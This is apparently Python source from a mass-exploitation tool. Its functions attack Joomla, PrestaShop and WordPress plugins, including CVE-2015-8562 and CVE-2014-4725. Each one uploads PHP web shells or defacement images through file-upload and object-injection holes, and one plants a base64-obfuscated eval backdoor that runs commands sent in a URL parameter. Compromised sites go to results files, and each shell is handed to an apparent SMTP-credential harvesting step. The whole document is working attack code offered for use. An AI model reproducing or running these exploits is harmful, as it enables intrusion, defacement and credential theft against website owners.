def Exploit(site): try: requests.post( 'http://' + site + '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/' 'php-ofc-library/ofc_upload_image.php?name=vuln.php', data=payloadshell, headers=Headers, timeout=10) Exp = requests.get( 'http://' + site + '/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/' 'tmp-upload-images/vuln.php', headers=Headers, timeout=10) if 'Vuln!!' in str(Exp.content): with open('result/Shell_results.txt', 'a') as writer: writer.write( site + '/administrator/components/com_civicrm/civicrm/packages/' 'OpenFlashChart/tmp-upload-images/vuln.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell( site + '/administrator/components/com_civicrm/civicrm/packages/' 'OpenFlashChart/tmp-upload-images/vuln.php?cmd=id') return printModule.returnYes(site, 'N/A', 'Com_civicrm', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla')
def exploit(url): try: target_url = url + '/index.php/component/users' make_req(target_url, get_backdoor_pay()) if ping_backdoor(url, backdoor_param): execute_backdoor( url, 'system(\'echo "Vuln!!" > vuln.htm\');') # cmd=commend execute_backdoor( url, 'system(\'echo "Vuln!!<?php {}(base64_decode("{}")); ?>" > vuln.php\');' .format('eval', 'c3lzdGVtKCRfR0VUWyJjbWQiXSk7')) CheckShell = requests.get('http://' + url + '/vuln.php', headers=Headers, timeout=10) checkIndex = requests.get('http://' + url + '/vuln.htm', headers=Headers, timeout=10) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(url + '/vuln.php?cmd=id' + '\n') getSMTP.JooomlaSMTPshell(url + '/vuln.php?cmd=id') if 'Vuln!!' in str(checkIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(url + '/vuln.htm\n') return printModule.returnYes(url, 'CVE-2015-8562', 'Joomla 3.x Rce', 'Joomla') else: return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce', 'Joomla') except: return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce', 'Joomla')
def Exploit(site): try: Exp = site + '/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php' Checkvuln = requests.get('http://' + Exp, timeout=10, headers=Headers) FileDataIndex = {'qqfile': open(Jce_Deface_image, 'rb')} if Checkvuln.status_code == 200: requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers) IndexPath = site + '/modules/advancedslider/uploads/' + Jce_Deface_image.split( '/')[1] CheckIndex = requests.get('http://' + IndexPath, timeout=10, headers=Headers) if 'GIF89a' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(IndexPath + '\n') return printModule.returnYes(site, 'N/A', 'advancedslider Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'advancedslider Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'advancedslider Module', 'Prestashop') except: return printModule.returnNo(site, 'N/A', 'advancedslider Module', 'Prestashop')
def Exploit(site): try: Exp = site + '/modules/cartabandonmentproOld/upload.php' Checkvuln = requests.get('http://' + Exp, timeout=5, headers=Headers) FileDataIndex = {'image': open(Jce_Deface_image, 'rb')} if Checkvuln.status_code == 200: requests.post('http://' + Exp, files=FileDataIndex, timeout=5, headers=Headers) IndexPath = site + '/modules/cartabandonmentproOld/uploads/' + Jce_Deface_image.split( '/')[1] CheckIndex = requests.get('http://' + IndexPath, timeout=5, headers=Headers) if 'GIF89a' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(IndexPath + '\n') return printModule.returnYes(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop') except: return printModule.returnNo(site, 'N/A', 'CartabandonmentproOld Module', 'Prestashop')
def Exploit(site): try: Exp = site + '/modules/columnadverts/uploadimage.php' FileDataIndex = {'userfile': open('files/pwn.gif', 'rb')} FileDataShell = {'userfile': open('files/up.php', 'rb')} GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers) if 'success' in GoT.content: IndexPath = '/modules/columnadverts/slides/pwn.gif' CheckIndex = requests.get('http://' + site + IndexPath, timeout=10, headers=Headers) if 'GIF89a' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(IndexPath + '\n') requests.post('http://' + Exp, files=FileDataShell, timeout=10, headers=Headers) ShellPath = '/modules/columnadverts/slides/up.php' CheckShell = requests.get('http://' + site + ShellPath, timeout=10, headers=Headers) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + ShellPath + '\n') return printModule.returnYes(site, 'N/A', 'Columnadverts Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop') else: return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop') except: return printModule.returnNo(site, 'N/A', 'Columnadverts Module', 'Prestashop')
def Exploit(site): try: FileShell = {'my-theme': open(MailPoetZipShell, 'rb')} PostData = {'action': "themeupload", 'submitter': "Upload", 'overwriteexistingtheme': "on", 'page': 'GZNeFLoZAb'} UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} url = "http://" + site + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes" GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10) if 'page=wysija_campaigns&action=themes&reload=1' in str(GoT.content): sh = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/vuln.php' index = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' CheckShell = requests.get(sh, timeout=10, headers=Headers) CheckIndex = requests.get(index, timeout=10, headers=Headers) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/wp-content/uploads/wysija/themes/rock/vuln.php' + '\n') if 'GIF89a' in str(CheckIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' + '\n') return printModule.returnYes(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress') else: return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress') except: return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')